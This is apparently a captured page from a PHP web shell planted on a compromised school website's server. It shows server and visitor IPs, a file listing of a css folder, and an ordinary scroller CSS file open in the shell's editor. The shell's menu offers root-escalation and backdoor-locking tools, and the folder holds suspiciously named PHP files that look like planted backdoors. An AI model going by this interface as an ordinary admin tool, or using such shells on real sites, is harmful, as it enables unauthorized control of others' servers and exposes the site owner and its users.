Linux pro52-142.static.lnwhostname.com 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
Apache/2
Server IP : 111.223.52.142 & Your IP : 216.73.216.40
Domains :
Cant Read [ /etc/named.conf ]
User : apache
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
zp9233 /
domains /
sy.ac.th /
public_html /
css /
Delete
Unzip
Name
Size
Permission
Date
Action
Scroller_Stop.css
880
B
-rwxrwxrwx
2010-12-22 18:18
autocomplete.css
847
B
-rwxrwxrwx
2010-06-27 16:28
backbox.css
2.09
KB
-rwxrwxrwx
2010-12-18 07:21
calendar.css
1.43
KB
-rwxrwxrwx
2012-04-25 22:49
calendar.php
32.03
KB
-rw-r--r--
2025-10-23 18:00
install.css
4.25
KB
-rwxrwxrwx
2010-06-27 16:29
licenses.php
83
B
-rw-r--r--
2025-01-26 20:19
lightbox.css
1.61
KB
-rwxrwxrwx
2010-12-18 07:21
noxmc.php
11.25
KB
-rw-r--r--
2025-03-26 16:49
pulut_there.php
91.7
KB
-rw-r--r--
2026-09-14 04:49
scrollable-buttons.css
1.16
KB
-rwxrwxrwx
2010-05-19 10:55
scrollable-horizontal.css
1.01
KB
-rwxrwxrwx
2010-06-27 16:15
scrollable-horizontal.css.php
3.16
KB
-rw-r--r--
2026-07-29 17:18
template_css.css
23.23
KB
-rwxrwxrwx
2020-12-01 15:31
Save
Rename
/* this makes it possible to add next button beside scrollable */ .scrollable { float:left; } /* prev, next, prevPage and nextPage buttons */ a.browse { background:url(../images/hori_large.png) no-repeat; display:block; width:30px; height:30px; float:left; margin:40px 10px; cursor:pointer; font-size:1px; } /* right */ a.right { background-position: 0 -30px; clear:right; margin-right: 0px;} a.right:hover { background-position:-30px -30px; } a.right:active { background-position:-60px -30px; } /* left */ a.left { margin-left: 0px; } a.left:hover { background-position:-30px 0; } a.left:active { background-position:-60px 0; } /* up and down */ a.up, a.down { background:url(../images/vert_large.png) no-repeat; float: none; margin: 10px 50px; } /* up */ a.up:hover { background-position:-30px 0; } a.up:active { background-position:-60px 0; } /* down */ a.down { background-position: 0 -30px; } a.down:hover { background-position:-30px -30px; } a.down:active { background-position:-60px -30px; } /* disabled navigational button */ a.disabled { visibility:hidden !important; }